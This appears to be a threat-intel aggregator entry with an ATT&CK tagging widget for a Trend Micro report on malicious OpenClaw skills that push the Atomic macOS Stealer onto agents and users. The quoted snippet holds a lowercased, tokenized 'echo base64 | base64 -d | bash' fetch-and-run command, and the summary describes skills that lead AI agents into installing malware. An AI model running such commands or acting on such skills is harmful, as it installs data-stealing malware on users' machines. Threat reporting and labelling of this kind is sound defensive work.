Trend Micro Research

Malicious OpenClaw Skills Used to Distribute Atomic macOS Stealer

Roel Reyes · 2026-02-23 · Read original ↗

ATT&CK techniques detected

1 predictions

T1059.004Unix Shell

40%

"install. app - distribution. net / setup / " & & echo ' l2jpbi9iyxnoic1jicikkgn1cmwglwzzu0wgahr0cdovlzkxljkylji0mi4zmc9ly2uwzjiwohu3dxfoczz4ksi = ' | base64 - d | bash a similar point of entry is shown in figure 1. if the model being used is intelligent enough to run the tool ( b…"

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

Summary

Malicious OpenClaw skills trick AI agents and users into installing a new AMOS variant that steals extensive data at scale.